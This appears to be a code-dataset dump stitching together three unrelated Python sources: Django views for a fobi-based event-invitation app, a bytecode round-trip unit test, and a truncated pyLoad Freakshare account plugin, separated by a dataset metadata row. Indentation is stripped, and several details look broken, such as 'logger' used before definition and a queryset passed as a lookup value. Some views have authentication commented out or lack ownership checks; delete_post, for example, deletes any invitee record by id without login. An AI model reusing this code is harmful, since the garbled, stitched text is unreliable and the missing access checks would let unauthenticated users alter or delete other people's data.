def get_success_url(self, **kwargs):
pk = Location.objects.filter(
pk=self.kwargs['pk']).values_list(
'event__pk', flat=True)[0]
return reverse_lazy('events:detail',
kwargs={'pk': pk})
class LocationUpdate(LoginRequiredMixin, UpdateView):
model = Location
form_class = LocationForm
# After update go the event
def get_success_url(self, **kwargs):
pk = Location.objects.filter(
pk=self.kwargs['pk']).values_list('event__pk', flat=True)[0]
return reverse_lazy('events:detail',
kwargs={'pk': pk})
class AjaxableResponseMixin(object):
"""
Mixin to add AJAX support to a form.
Must be used with an object-based FormView (e.g. CreateView)
"""
def form_invalid(self, form):
response = super(AjaxableResponseMixin, self).form_invalid(form)
if self.request.is_ajax():
return JsonResponse(form.errors, status=400)
else:
return response
def form_valid(self, form):
# We make sure to call the parent's form_valid() method because
# it might do some processing (in the case of CreateView, it will
# call form.save() for example).
response = super(AjaxableResponseMixin, self).form_valid(form)
if self.request.is_ajax():
data = {
'pk': self.object.pk,
'name': self.object.name,
'email': self.object.email,
}
return JsonResponse(data)
else:
return response
# from tablib import Dataset
class EmailCreate(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
"""Organiser can create Location"""
template_name = 'events/email_form.html'
form_class = EmailForm
model = EmailApp
def form_valid(self, form):
# Pass the Foreign Key to the form
form.instance.event = get_object_or_404(
Event, pk=self.kwargs.get('pk'))
# Verify the user quota against default quota
event_email_quota = Event.objects.filter(
pk=self.kwargs['pk']).values_list(
'email_quota', flat=True)[0]
user_email_count = EmailApp.objects.filter(
event__pk=self.kwargs['pk']).filter(
event__user=self.request.user).count()
email = form.save(commit=False)
# Save form only if user passes condition
if user_email_count < event_email_quota:
email.save()
return super().form_valid(form)
# Else redirect him to the Events list
else:
return HttpResponseRedirect(
reverse('events:list'))
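    # Expose the invitees registered so far and the event's e-mail quota so
    # the template can show how many invitations remain.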
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['emails'] = EmailApp.objects.filter(
event__pk=self.kwargs.get('pk')).order_by('-pk')
context['event_email_quota'] = Event.objects.filter(
pk=self.kwargs['pk']).values_list(
'email_quota', flat=True)[0]
return context
def get_success_url(self, **kwargs):
return reverse_lazy('events:list')
# class InviteeURL(DetailView):
# model = Event
# template_name = 'invitee_url.html'
import os # noqa
import csv # noqa
def upload_csv(request):
    if not request.user.is_authenticated:
        return redirect("home")
    # NOTE: the CSV file name below is an illustrative assumption; the view
    # expects a file next to this module whose rows have the form:
    # <event pk>, <invitee name>, <invitee email>.
    csv_path = os.path.join(
        os.path.dirname(os.path.abspath(__file__)), 'emails.csv')
    context = {}
    try:
        with open(csv_path) as f:
            reader = csv.reader(f)
            for row in reader:
                event_obj = Event.objects.get(pk=row[0])
                EmailApp.objects.get_or_create(
                    event=event_obj,
                    name=str(row[1]),
                    email=str(row[2]),
                )
            context['success'] = "Added to database"
    except (csv.Error, OSError, ValueError, Event.DoesNotExist) as e:
        logger.error(e)
        context['error'] = e
    template = "events/email_form.html"
    return render(request, template, context)
# @login_required
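# Expects an AJAX DELETE request whose body carries the ``postpk`` of the
# EmailApp row to remove; replies with a small JSON acknowledgement.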
def delete_post(request):
if request.method == 'DELETE':
post = EmailApp.objects.get(
pk=int(QueryDict(request.body).get('postpk')))
post.delete()
response_data = {}
response_data['msg'] = 'Post was deleted.'
return HttpResponse(
json.dumps(response_data),
content_type="application/json"
)
else:
return HttpResponse(
json.dumps({"nothing to see": "this isn't happening"}),
content_type="application/json"
)
def _delete_plugin_entry(request,
entry_id,
entry_model_cls,
get_user_plugin_uids_func,
message,
html_anchor):
"""Abstract delete entry.
:param django.http.HttpRequest request:
:param int entry_id:
:param fobi.models.AbstractPluginEntry entry_model_cls: Subclass of
``fobi.models.AbstractPluginEntry``.
:param callable get_user_plugin_uids_func:
:param str message:
:return django.http.HttpResponse:
"""
try:
obj = entry_model_cls._default_manager \
.select_related('form_entry') \
.get(pk=entry_id,
form_entry__user__pk=request.user.pk)
except ObjectDoesNotExist:
raise Http404(("{0} not found.").format(
entry_model_cls._meta.verbose_name)
)
form_entry = obj.form_entry
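    # Give the plugin a chance to clean up any data it stored for this entry
    # before the database row itself is removed.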
plugin = obj.get_plugin(request=request)
plugin.request = request
plugin._delete_plugin_data()
obj.delete()
messages.info(request, message.format(plugin.name))
redirect_url = reverse(
'events:fobi.edit_form_entry', kwargs={'form_entry_id': form_entry.pk}
)
return redirect("{0}{1}".format(redirect_url, html_anchor))
# *****************************************************************************
# **************************** Add form handler entry *************************
# *****************************************************************************
@login_required
# @permission_required('events.add_formhandlerentry')
def add_form_handler_entry(request,
form_entry_id,
form_handler_plugin_uid,
theme=None,
template_name=None):
"""Add form handler entry.
:param django.http.HttpRequest request:
:param int form_entry_id:
:param int form_handler_plugin_uid:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
try:
form_entry = Event._default_manager.get(pk=form_entry_id)
except ObjectDoesNotExist:
raise Http404("Form entry not found.")
user_form_handler_plugin_uids = get_user_form_handler_plugin_uids(
request.user
)
if form_handler_plugin_uid not in user_form_handler_plugin_uids:
raise Http404("Plugin does not exist or you are not allowed "
"to use this plugin!")
form_handler_plugin_cls = form_handler_plugin_registry.get(
form_handler_plugin_uid
)
# Check if we deal with form handler plugin that is only allowed to be
# used once. In that case, check if it has been used already in the current
# form entry.
if not form_handler_plugin_cls.allow_multiple:
times_used = FormHandlerEntry._default_manager \
.filter(form_entry__id=form_entry_id,
plugin_uid=form_handler_plugin_cls.uid) \
.count()
if times_used > 0:
raise Http404(
("The {0} plugin can be used only once in a "
"form.").format(form_handler_plugin_cls.name)
)
form_handler_plugin = form_handler_plugin_cls(user=request.user)
form_handler_plugin.request = request
form_handler_plugin_form_cls = form_handler_plugin.get_form()
form = None
obj = FormHandlerEntry()
obj.form_entry = form_entry
obj.plugin_uid = form_handler_plugin_uid
obj.user = request.user
save_object = False
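    # Handler plugins without a configuration form are saved straight away;
    # otherwise the plugin's own form has to validate first.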
if not form_handler_plugin_form_cls:
save_object = True
elif request.method == 'POST':
form = form_handler_plugin.get_initialised_create_form_or_404(
data=request.POST,
files=request.FILES
)
if form.is_valid():
# Saving the plugin form data.
form.save_plugin_data(request=request)
# Getting the plugin data.
obj.plugin_data = form.get_plugin_data(request=request)
save_object = True
else:
form = form_handler_plugin.get_initialised_create_form_or_404()
if save_object:
# Save the object.
obj.save()
messages.info(
request,
('The form handler plugin "{0}" was added '
'successfully.').format(form_handler_plugin.name)
)
# return redirect(
# "{0}?active_tab=tab-form-handlers".format(
# reverse(
# 'fobi.edit_form_entry',
# kwargs={'form_entry_id': form_entry_id}
# )
# )
# )
return redirect(reverse('events:list'))
context = {
'form': form,
'form_entry': form_entry,
'form_handler_plugin': form_handler_plugin,
}
# If given, pass to the template (and override the value set by
# the context processor.
if theme:
context.update({'fobi_theme': theme})
if not template_name:
if not theme:
theme = get_theme(request=request, as_instance=True)
template_name = theme.add_form_handler_entry_template
return render(request, template_name, context)
# *****************************************************************************
# **************************** Edit form handler entry ************************
# *****************************************************************************
# @login_required
# @permission_required('events.change_formhandlerentry')
def edit_form_handler_entry(request,
form_handler_entry_id,
theme=None,
template_name=None):
"""Edit form handler entry.
:param django.http.HttpRequest request:
:param int form_handler_entry_id:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
try:
obj = FormHandlerEntry._default_manager \
.select_related('form_entry') \
.get(pk=form_handler_entry_id)
except ObjectDoesNotExist:
raise Http404("Form handler entry not found.")
form_entry = obj.form_entry
form_handler_plugin = obj.get_plugin(request=request)
form_handler_plugin.request = request
FormHandlerPluginForm = form_handler_plugin.get_form()
form = None
if not FormHandlerPluginForm:
messages.info(
request,
('The form handler plugin "{0}" is not '
'configurable!').format(form_handler_plugin.name)
)
return redirect('events:fobi.edit_form_entry',
form_entry_id=form_entry.pk)
elif request.method == 'POST':
form = form_handler_plugin.get_initialised_edit_form_or_404(
data=request.POST,
files=request.FILES
)
if form.is_valid():
# Saving the plugin form data.
form.save_plugin_data(request=request)
# Getting the plugin data.
obj.plugin_data = form.get_plugin_data(request=request)
# Save the object.
obj.save()
messages.info(
request,
('The form handler plugin "{0}" was edited '
'successfully.').format(form_handler_plugin.name)
)
return redirect('events:fobi.edit_form_entry',
form_entry_id=form_entry.pk)
else:
form = form_handler_plugin.get_initialised_edit_form_or_404()
context = {
'form': form,
'form_entry': form_entry,
'form_handler_plugin': form_handler_plugin,
}
# If given, pass to the template (and override the value set by
# the context processor.
if theme:
context.update({'fobi_theme': theme})
if not template_name:
if not theme:
theme = get_theme(request=request, as_instance=True)
template_name = theme.edit_form_handler_entry_template
return render(request, template_name, context)
# *****************************************************************************
# **************************** Delete form handler entry **********************
# *****************************************************************************
# @login_required
# @permission_required('events.delete_formhandlerentry')
def delete_form_handler_entry(request, form_handler_entry_id):
"""Delete form handler entry.
:param django.http.HttpRequest request:
:param int form_handler_entry_id:
:return django.http.HttpResponse:
"""
return _delete_plugin_entry(
request=request,
entry_id=form_handler_entry_id,
entry_model_cls=FormHandlerEntry,
get_user_plugin_uids_func=get_user_form_handler_plugin_uids,
message='The form handler plugin "{0}" '
'was deleted successfully.',
html_anchor='?active_tab=tab-form-handlers'
)
# *****************************************************************************
# **************************** Create form entry ******************************
# *****************************************************************************
@login_required
def edit_form_entry(request, form_entry_id, theme=None, template_name=None):
"""Edit form entry.
:param django.http.HttpRequest request:
:param int form_entry_id:
:param fobi.base.BaseTheme theme: Theme instance.
:param str template_name:
:return django.http.HttpResponse:
"""
try:
form_entry = Event._default_manager \
.select_related('user') \
.prefetch_related('formelemententry_set') \
.get(pk=form_entry_id, user__pk=request.user.pk)
except ObjectDoesNotExist as err:
raise Http404("Form entry not found.")
if request.method == 'POST':
# The form entry form (does not contain form elements)
form = FormEntryForm(request.POST, request.FILES, instance=form_entry,
request=request)
# This is where we save ordering if it has been changed.
# The `FormElementEntryFormSet` contain ids and positions only.
if 'ordering' in request.POST:
form_element_entry_formset = FormElementEntryFormSet(
request.POST,
request.FILES,
queryset=form_entry.formelemententry_set.all(),
# prefix = 'form_element'
)
            # If form elements aren't properly made (developer's fault)
# there might be problems with saving the ordering - likely
# in case of hidden elements only. Thus, we want to avoid
# errors here.
try:
if form_element_entry_formset.is_valid():
form_element_entry_formset.save()
messages.info(
request,
"Elements ordering edited successfully."
)
return redirect(
reverse('events:fobi.edit_form_entry',
kwargs={'form_entry_id': form_entry_id})
)
except MultiValueDictKeyError as err: # noqa
messages.error(
request,
"Errors occurred while trying to change the "
"elements ordering!")
return redirect(
reverse('events:fobi.edit_form_entry',
kwargs={'form_entry_id': form_entry_id})
)
else:
form_element_entry_formset = FormElementEntryFormSet(
queryset=form_entry.formelemententry_set.all(),
# prefix='form_element'
)
if form.is_valid():
obj = form.save(commit=False)
obj.user = request.user
try:
obj.save()
messages.info(
request,
('Form {0} was edited successfully.').format(
form_entry.name
)
)
return redirect(
reverse(
'events:fobi.edit_form_entry',
kwargs={'form_entry_id': form_entry_id}
)
)
except IntegrityError as err:
messages.info(
request,
(
'Errors occurred while saving the form: {0}.'
).format(str(err))
)
else:
# The form entry form (does not contain form elements)
form = FormEntryForm(instance=form_entry, request=request)
form_element_entry_formset = FormElementEntryFormSet(
queryset=form_entry.formelemententry_set.all(),
# prefix='form_element'
)
# In case of success, we don't need this (since redirect would happen).
# Thus, fetch only if needed.
form_elements = form_entry.formelemententry_set.all()
form_handlers = form_entry.formhandlerentry_set.all()[:]
used_form_handler_uids = [form_handler.plugin_uid
for form_handler
in form_handlers]
# The code below (two lines below) is not really used at the moment,
# thus - comment out, but do not remove, as we might need it later on.
# all_form_entries = FormEntry._default_manager \
# .only('id', 'name', 'slug') \
# .filter(user__pk=request.user.pk)
# List of form element plugins allowed to user
user_form_element_plugins = get_user_form_element_plugins_grouped(
request.user
)
# List of form handler plugins allowed to user
user_form_handler_plugins = get_user_form_handler_plugins(
request.user,
exclude_used_singles=True,
used_form_handler_plugin_uids=used_form_handler_uids
)
# Assembling the form for preview
form_cls = assemble_form_class(
form_entry,
origin='edit_form_entry',
origin_kwargs_update_func=append_edit_and_delete_links_to_field,
request=request
)
assembled_form = form_cls()
# print('assembled_form', assembled_form)
# In debug mode, try to identify possible problems.
if DEBUG:
assembled_form.as_p()
else:
try:
assembled_form.as_p()
except Exception as err:
logger.error(err)
# If no theme provided, pick a default one.
if not theme:
theme = get_theme(request=request, as_instance=True)
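    # Collect the static assets (JS/CSS) declared by the form element plugins
    # so the edit template can include them.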
theme.collect_plugin_media(form_elements)
# Verify the user quota against default quota
event_location_quota = Event.objects.filter(
pk=form_entry.pk).values_list(
'collection_quota', flat=True)[0]
user_locations_count = FormEntry.objects.filter(
event__pk=form_entry.pk).filter(
event__user=request.user).count()
context = {
'form': form,
'form_entry': form_entry,
'form_elements': form_elements,
'form_handlers': form_handlers,
# 'all_form_entries': all_form_entries,
'user_form_element_plugins': user_form_element_plugins,
'user_form_handler_plugins': user_form_handler_plugins,
'assembled_form': assembled_form,
'form_element_entry_formset': form_element_entry_formset,
'fobi_theme': theme,
'collection_quota': request.user.collection_value,
'user_locations_count': user_locations_count,
'event_location_quota': event_location_quota,
}
# if not template_name:
# template_name = theme.edit_form_entry_template
template_name = 'bootstrap3/edit_form_view.html'
return render(request, template_name, context)
logger = logging.getLogger(__name__)
@login_required
def dashboard(request, theme=None, template_name=None):
"""Dashboard.
:param django.http.HttpRequest request:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
form_entries = Event._default_manager \
.filter(user__pk=request.user.pk) \
.select_related('user')
context = {
'form_entries': form_entries,
'form_importers': get_form_impoter_plugin_urls(),
}
# If given, pass to the template (and override the value set by
# the context processor.
if theme:
context.update({'fobi_theme': theme})
if not template_name:
theme = get_theme(request=request, as_instance=True)
template_name = theme.dashboard_template
return render(request, template_name, context)
class EventDetailInvitati(LoginRequiredMixin, DetailView):
"""Organiser can view a list of his events"""
model = EmailApp
template_name = 'events/event_detail_invitati.html'
slug_field = 'secret'
slug_url_kwarg = 'secret'
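    # The invitee record is resolved by its secret token from the URL rather
    # than by a numeric pk.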
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context['event'] = self.object.event
        context['locations'] = Location.objects.filter(
            event__title=self.object.event)
        context['anas'] = FormElementEntry.objects.filter(
            form_entry_id=self.object.pk)
        context['collections'] = assemble_form_class(
            self.object.event,
        )
        # context['collections'] = self.get_form()
        return context
def view_form_entry(
request,
# form_entry_slug,
secret,
theme=None,
template_name=None):
"""View created form.
:param django.http.HttpRequest request:
    :param string secret:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
secrets = EmailApp.objects.filter(secret=secret)
try:
# kwargs = {'slug': form_entry_slug}
kwargs = {'emailapp': secrets}
if not request.user.is_authenticated():
kwargs.update({'is_public': True})
form_entry = Event._default_manager.select_related('user') \
.get(**kwargs)
except ObjectDoesNotExist as err:
raise Http404("Form entry not found.")
form_element_entries = form_entry.formelemententry_set.all()[:]
# This is where the most of the magic happens. Our form is being built
# dynamically.
form_cls = assemble_form_class(
form_entry,
form_element_entries=form_element_entries,
request=request
)
if request.method == 'POST':
form = form_cls(request.POST, request.FILES)
# Fire pre form validation callbacks
fire_form_callbacks(form_entry=form_entry,
request=request, form=form,
stage=CALLBACK_BEFORE_FORM_VALIDATION)
if form.is_valid():
# Fire form valid callbacks, before handling submitted plugin
# form data.
form = fire_form_callbacks(
form_entry=form_entry,
request=request,
form=form,
stage=CALLBACK_FORM_VALID_BEFORE_SUBMIT_PLUGIN_FORM_DATA
)
# Fire plugin processors
form = submit_plugin_form_data(
form_entry=form_entry,
invitee=secrets,
request=request,
form=form
)
# Fire form valid callbacks
form = fire_form_callbacks(form_entry=form_entry,
request=request, form=form,
stage=CALLBACK_FORM_VALID)
# Run all handlers
handler_responses, handler_errors = run_form_handlers(
form_entry=form_entry,
invitee=secret,
request=request,
form=form,
form_element_entries=form_element_entries
)
# Warning that not everything went ok.
if handler_errors:
for handler_error in handler_errors:
messages.warning(
request,
("Error occurred: {0}.").format(handler_error)
)
# Fire post handler callbacks
fire_form_callbacks(
form_entry=form_entry,
request=request,
form=form,
stage=CALLBACK_FORM_VALID_AFTER_FORM_HANDLERS
)
messages.info(
request,
("Form {0} was submitted successfully.").format(
form_entry.title
)
)
return redirect(
reverse('events:fobi.form_entry_submitted',
args=[form_entry.slug])
)
else:
# Fire post form validation callbacks
fire_form_callbacks(form_entry=form_entry, request=request,
form=form, stage=CALLBACK_FORM_INVALID)
else:
# Providing initial form data by feeding entire GET dictionary
# to the form, if ``GET_PARAM_INITIAL_DATA`` is present in the
# GET.
kwargs = {}
if GET_PARAM_INITIAL_DATA in request.GET:
kwargs = {'initial': request.GET}
form = form_cls(**kwargs)
# In debug mode, try to identify possible problems.
if DEBUG:
form.as_p()
else:
try:
form.as_p()
except Exception as err:
logger.error(err)
theme = get_theme(request=request, as_instance=True)
theme.collect_plugin_media(form_element_entries)
context = {
'form': form,
'form_entry': form_entry,
'fobi_theme': theme,
'fobi_form_title': form_entry.title,
}
if not template_name:
# template_name = theme.view_form_entry_template
template_name = 'events/event_detail_invitati.html'
return render(request, template_name, context)
def view_form_entry_public(
request,
form_entry_slug,
# secret,
theme=None,
template_name=None):
"""View created form.
:param django.http.HttpRequest request:
:param string form_entry_slug:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
# secrets = EmailApp.objects.filter(secret=secret)
try:
kwargs = {'slug': form_entry_slug}
# kwargs = {'emailapp': secrets}
# if not request.user.is_authenticated():
# kwargs.update({'is_public': True})
form_entry = Event._default_manager.select_related('user') \
.get(**kwargs)
    except ObjectDoesNotExist:
        raise Http404("Form entry not found.")
form_element_entries = form_entry.formelemententry_set.all()[:]
    # This is where most of the magic happens. Our form is being built
    # dynamically.
form_cls = assemble_form_class(
form_entry,
form_element_entries=form_element_entries,
request=request
)
if request.method == 'POST':
form = form_cls(request.POST, request.FILES)
# Fire pre form validation callbacks
fire_form_callbacks(form_entry=form_entry,
request=request, form=form,
stage=CALLBACK_BEFORE_FORM_VALIDATION)
if form.is_valid():
# Fire form valid callbacks, before handling submitted plugin
# form data.
form = fire_form_callbacks(
form_entry=form_entry,
request=request,
form=form,
stage=CALLBACK_FORM_VALID_BEFORE_SUBMIT_PLUGIN_FORM_DATA
)
# Fire plugin processors
form = submit_plugin_form_data(
form_entry=form_entry,
# invitee=secrets,
request=request,
form=form
)
# Fire form valid callbacks
form = fire_form_callbacks(form_entry=form_entry,
request=request, form=form,
stage=CALLBACK_FORM_VALID)
# Run all handlers
handler_responses, handler_errors = run_form_handlers(
form_entry=form_entry,
# invitee=secret,
request=request,
form=form,
form_element_entries=form_element_entries
)
            # Warn that not everything went OK.
if handler_errors:
for handler_error in handler_errors:
messages.warning(
request,
("Error occurred: {0}.").format(handler_error)
)
# Fire post handler callbacks
fire_form_callbacks(
form_entry=form_entry,
request=request,
form=form,
stage=CALLBACK_FORM_VALID_AFTER_FORM_HANDLERS
)
messages.info(
request,
("Form {0} was submitted successfully.").format(
form_entry.title
)
)
return redirect(
reverse('events:fobi.form_entry_submitted',
args=[form_entry.slug])
)
else:
# Fire post form validation callbacks
fire_form_callbacks(form_entry=form_entry, request=request,
form=form, stage=CALLBACK_FORM_INVALID)
else:
# Providing initial form data by feeding entire GET dictionary
# to the form, if ``GET_PARAM_INITIAL_DATA`` is present in the
# GET.
kwargs = {}
if GET_PARAM_INITIAL_DATA in request.GET:
kwargs = {'initial': request.GET}
form = form_cls(**kwargs)
# In debug mode, try to identify possible problems.
if DEBUG:
form.as_p()
else:
try:
form.as_p()
except Exception as err:
logger.error(err)
theme = get_theme(request=request, as_instance=True)
theme.collect_plugin_media(form_element_entries)
context = {
'form': form,
'form_entry': form_entry,
'fobi_theme': theme,
'fobi_form_title': form_entry.title,
}
if not template_name:
# template_name = theme.view_form_entry_template
template_name = 'events/event_detail_invitati.html'
return render(request, template_name, context)
@login_required
def delete_form_entry(request, form_entry_id, template_name=None):
"""Delete form entry.
:param django.http.HttpRequest request:
:param int form_entry_id:
:param string template_name:
:return django.http.HttpResponse:
"""
try:
obj = FormEntry._default_manager \
.get(pk=form_entry_id, user__pk=request.user.pk)
except ObjectDoesNotExist:
raise Http404("Form entry not found.")
obj.delete()
messages.info(
request,
('The form "{0}" was deleted successfully.').format(obj.name)
)
return redirect('events:fobi.dashboard')
@login_required
def add_form_element_entry(request,
form_entry_id,
form_element_plugin_uid,
theme=None,
template_name=None):
"""Add form element entry.
:param django.http.HttpRequest request:
:param int form_entry_id:
    :param str form_element_plugin_uid:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
try:
form_entry = Event._default_manager \
.prefetch_related('formelemententry_set') \
.get(pk=form_entry_id)
except ObjectDoesNotExist:
raise Http404("Form entry not found.")
form_elements = form_entry.formelemententry_set.all()
user_form_element_plugin_uids = get_user_form_field_plugin_uids(
request.user
)
if form_element_plugin_uid not in user_form_element_plugin_uids:
raise Http404("Plugin does not exist or you are not allowed "
"to use this plugin!")
form_element_plugin_cls = form_element_plugin_registry.get(
form_element_plugin_uid
)
form_element_plugin = form_element_plugin_cls(user=request.user)
form_element_plugin.request = request
form_element_plugin_form_cls = form_element_plugin.get_form()
form = None
obj = FormElementEntry()
obj.form_entry = form_entry
obj.plugin_uid = form_element_plugin_uid
obj.user = request.user
save_object = False
if form_elements.count() < form_entry.collection_quota:
# If plugin doesn't have a form
if not form_element_plugin_form_cls:
save_object = True
# If POST
elif request.method == 'POST':
# If element has a form
form = form_element_plugin.get_initialised_create_form_or_404(
data=request.POST,
files=request.FILES
)
form.validate_plugin_data(form_elements, request=request)
if form.is_valid():
# Saving the plugin form data.
form.save_plugin_data(request=request)
# Getting the plugin data.
obj.plugin_data = form.get_plugin_data(request=request)
if form_elements.count() < form_entry.collection_quota:
save_object = True
else:
return HttpResponseRedirect(
reverse('events:list'))
# If not POST
else:
form = form_element_plugin.get_initialised_create_form_or_404()
else:
return HttpResponseRedirect(
reverse('events:list'))
if save_object:
# Handling the position
position = 1
records = FormElementEntry.objects.filter(form_entry=form_entry) \
.aggregate(models.Max('position'))
if records:
try:
position = records['{0}__max'.format('position')] + 1
except TypeError:
pass
obj.position = position
# Save the object.
obj.save()
messages.info(
request,
('The form element plugin "{0}" was added '
'successfully.').format(form_element_plugin.name)
)
return redirect(
# "{0}?active_tab=tab-form-elements".format(
reverse('events:fobi.edit_form_entry',
kwargs={'form_entry_id': form_entry_id})
)
# )
context = {
'form': form,
'form_entry': form_entry,
'form_element_plugin': form_element_plugin,
}
# If given, pass to the template (and override the value set by
    # the context processor).
# if theme:
# context.update({'fobi_theme': theme})
if not template_name:
if not theme:
theme = get_theme(request=request, as_instance=True)
template_name = theme.add_form_element_entry_template
# else:
# template_name = 'k.html'
return render(request, template_name, context)
# else:
# return reverse_lazy('events:list')
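# Illustrative sketch (not part of the original module): the "next position"
# bookkeeping used in add_form_element_entry above, pulled out as a standalone
# helper so the aggregate pattern is easier to follow.
def _example_next_element_position(form_entry):
    """Return the position a newly added form element would receive."""
    records = FormElementEntry.objects.filter(form_entry=form_entry) \
                                      .aggregate(models.Max('position'))
    try:
        return records['position__max'] + 1
    except (KeyError, TypeError):
        # No elements yet (or no position recorded) -- start at 1.
        return 1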
# *****************************************************************************
# **************************** Edit form element entry ************************
# *****************************************************************************
@login_required
def edit_form_element_entry(request,
form_element_entry_id,
theme=None,
template_name=None):
"""Edit form element entry.
:param django.http.HttpRequest request:
:param int form_element_entry_id:
:param fobi.base.BaseTheme theme: Theme instance.
:param string template_name:
:return django.http.HttpResponse:
"""
try:
obj = FormElementEntry._default_manager \
.select_related('form_entry',
'form_entry__user') \
.get(pk=form_element_entry_id,
form_entry__user__pk=request.user.pk)
except ObjectDoesNotExist:
raise Http404("Form element entry not found.")
form_entry = obj.form_entry
form_element_plugin = obj.get_plugin(request=request)
form_element_plugin.request = request
FormElementPluginForm = form_element_plugin.get_form()
form = None
if not FormElementPluginForm:
messages.info(
request,
('The form element plugin "{0}" '
'is not configurable!').format(form_element_plugin.name)
)
return redirect('events:fobi.edit_form_entry', form_entry_id=form_entry.pk)
elif request.method == 'POST':
form = form_element_plugin.get_initialised_edit_form_or_404(
data=request.POST,
files=request.FILES
)
form_elements = FormElementEntry._default_manager \
.select_related('form_entry',
'form_entry__user') \
.exclude(pk=form_element_entry_id) \
.filter(form_entry=form_entry)
form.validate_plugin_data(form_elements, request=request)
if form.is_valid():
# Saving the plugin form data.
form.save_plugin_data(request=request)
# Getting the plugin data.
obj.plugin_data = form.get_plugin_data(request=request)
# Save the object.
obj.save()
messages.info(
request,
('The form element plugin "{0}" was edited '
'successfully.').format(form_element_plugin.name)
)
return redirect('events:fobi.edit_form_entry',
form_entry_id=form_entry.pk)
else:
form = form_element_plugin.get_initialised_edit_form_or_404()
form_element_plugin = obj.get_plugin(request=request)
form_element_plugin.request = request
context = {
'form': form,
'form_entry': form_entry,
'form_element_plugin': form_element_plugin,
}
print(form)
# If given, pass to the template (and override the value set by
    # the context processor).
if theme:
context.update({'fobi_theme': theme})
if not template_name:
if not theme:
theme = get_theme(request=request, as_instance=True)
template_name = theme.edit_form_element_entry_template
return render(request, template_name, context)
# *****************************************************************************
# **************************** Delete form element entry **********************
# *****************************************************************************
def _delete_plugin_entry_dragos(request,
entry_id,
entry_model_cls,
get_user_plugin_uids_func,
message,
html_anchor):
"""Abstract delete entry.
:param django.http.HttpRequest request:
:param int entry_id:
:param fobi.models.AbstractPluginEntry entry_model_cls: Subclass of
``fobi.models.AbstractPluginEntry``.
:param callable get_user_plugin_uids_func:
    :param str message:
    :param str html_anchor:
    :return django.http.HttpResponse:
"""
try:
obj = entry_model_cls._default_manager \
.select_related('form_entry') \
.get(pk=entry_id,
form_entry__user__pk=request.user.pk)
except ObjectDoesNotExist:
raise Http404(("{0} not found.").format(
entry_model_cls._meta.verbose_name)
)
form_entry = obj.form_entry
plugin = obj.get_plugin(request=request)
plugin.request = request
plugin._delete_plugin_data()
obj.delete()
messages.info(request, message.format(plugin.name))
redirect_url = reverse(
'events:fobi.edit_form_entry', kwargs={'form_entry_id': form_entry.pk}
)
return redirect("{0}{1}".format(redirect_url, html_anchor))
@login_required
def delete_form_element_entry(request, form_element_entry_id):
"""Delete form element entry.
:param django.http.HttpRequest request:
:param int form_element_entry_id:
:return django.http.HttpResponse:
"""
    # NOTE: assumes the customized ``_delete_plugin_entry_dragos`` helper
    # defined above is the intended target of this call.
    return _delete_plugin_entry_dragos(
request=request,
entry_id=form_element_entry_id,
entry_model_cls=FormElementEntry,
get_user_plugin_uids_func=get_user_form_field_plugin_uids,
message=(
'The form element plugin "{0}" was deleted successfully.'
),
html_anchor='?active_tab=tab-form-elements'
)
def form_entry_submitted(request, form_entry_slug=None, template_name=None):
"""Form entry submitted.
:param django.http.HttpRequest request:
:param string form_entry_slug:
:param string template_name:
:return django.http.HttpResponse:
"""
try:
kwargs = {'slug': form_entry_slug}
# if not request.user.is_authenticated():
# kwargs.update({'is_public': True})
form_entry = Event._default_manager \
.select_related('user') \
.get(**kwargs)
except ObjectDoesNotExist:
raise Http404("Form entry not found.")
context = {
'form_entry_slug': form_entry_slug,
'form_entry': form_entry
}
if not template_name:
theme = get_theme(request=request, as_instance=True)
template_name = theme.form_entry_submitted_template
return render(request, template_name, context)
| mit | -7,103,525,363,251,056,000 | 31.91716 | 83 | 0.562786 | false |
haypo/bytecode | bytecode/tests/test_code.py | 1 | 1482 | import unittest
from bytecode import ConcreteBytecode, Bytecode, ControlFlowGraph
from bytecode.tests import get_code
class CodeTests(unittest.TestCase):
"""Check that bytecode.from_code(code).to_code() returns code."""
def check(self, source, function=False):
ref_code = get_code(source, function=function)
code = ConcreteBytecode.from_code(ref_code).to_code()
self.assertEqual(code, ref_code)
code = Bytecode.from_code(ref_code).to_code()
self.assertEqual(code, ref_code)
bytecode = Bytecode.from_code(ref_code)
blocks = ControlFlowGraph.from_bytecode(bytecode)
code = blocks.to_bytecode().to_code()
self.assertEqual(code, ref_code)
def test_loop(self):
self.check('''
for x in range(1, 10):
x += 1
if x == 3:
continue
x -= 1
if x > 7:
break
x = 0
print(x)
''')
def test_varargs(self):
self.check('''
def func(a, b, *varargs):
pass
''', function=True)
def test_kwargs(self):
self.check('''
def func(a, b, **kwargs):
pass
''', function=True)
def test_kwonlyargs(self):
self.check('''
def func(*, arg, arg2):
pass
''', function=True)
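# Illustrative example (not part of the original test suite): the same
# round-trip the tests above rely on, shown on a one-line module.
def _example_roundtrip():
    code = get_code('x = 1 + 2')
    return ConcreteBytecode.from_code(code).to_code() == code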
if __name__ == "__main__":
unittest.main()
| mit | 2,037,071,801,119,486,500 | 25 | 69 | 0.516194 | false |
fzimmermann89/pyload | module/plugins/accounts/FreakshareCom.py | 1 | 1490 | # -*- coding: utf-8 -*-
import re
import time
from module.plugins.internal.Account import Account
class FreakshareCom(Account):
__name__ = "FreakshareCom"
__type__ = "account"
__version__ = "0.18"
__status__ = "testing"
__description__ = """Freakshare.com account plugin"""
__license__ = "GPLv3"
__authors__ = [("RaNaN", "[email protected]")]
def grab_info(self, user, password, data):
premium = False
validuntil = None
trafficleft = None
html = self.load("http://freakshare.com/")
try:
m = re.search(r'ltig bis:</td>\s*<td><b>([\d.:\-]+)</b></td>', html, re.M)
validuntil = time.mktime(time.strptime(m.group(1), "%d.%m.%Y - %H:%M"))
except Exception:
pass
try:
m = re.search(r'Traffic verbleibend:</td>\s*<td>([^<]+)', html, re.M)
trafficleft = self.parse_traffic(m.group(1))
except Exception:
pass
